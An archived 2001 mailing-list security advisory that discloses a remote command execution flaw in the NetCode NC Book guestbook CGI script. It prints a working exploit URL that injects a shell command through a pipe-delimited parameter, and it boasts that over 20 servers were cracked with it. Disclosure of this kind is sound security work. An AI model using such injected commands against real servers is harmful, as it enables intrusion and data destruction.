NetCode NC Book 0.2b remote command execution vulnerability

From: Hannibal Lector (digitalseedat_private)
Date: Mon Aug 13 2001 - 12:14:38 PDT

Next message: secureat_private: "[CLA-2001:411] Conectiva Linux Security Announcement - windowmaker"

Previous message: Hannibal Lector: "SIX-webboard 2.01 "show files" vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

* more than 20 servers were successfly cracked 
using this 'little' hole *

------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------

-NAME:
 NetCode NC Book 0.2b remote command execution 
vulnerability.

-DESCRIPTION: 
 NetCode's GuestBook. Find more info about it here:
http://netcode.lgg.ru/vault/ncbook/

-PROBLEM:
 A pretty big hole in the main script of that guestbook 
leads to command execution on the remote server 
running this vulnerable perl script.


-EXPLOIT: 
ex.: http://target/cgi-bin/ncbook/book.cgi?
action=default&current=|ls -
la/|&form_tid=996604045&prev=main.html&list_mess
age_index=10

!The above line if given will output the file contents of 
the kernel dir. Also you can execute any commands 
(ls, cat, rm etc)


-AUTHORs:
 Discovery: digitalseed and ksenor
 Advisory: digitalseed

-DISCLAIMER:
 PoizonB0x may not be held liable for the use or 
potential effects of these programs or advisories, nor 
the content contained within. Use them at your own 
risk.

-COPYRIGHT:
 PoizonB0x Crew - 
 www.poizonb0x.org (c) 2000-2001
  L...Future Security...l

------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------

Next message: secureat_private: "[CLA-2001:411] Conectiva Linux Security Announcement - windowmaker"
Previous message: Hannibal Lector: "SIX-webboard 2.01 "show files" vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 13 2001 - 12:41:00 PDT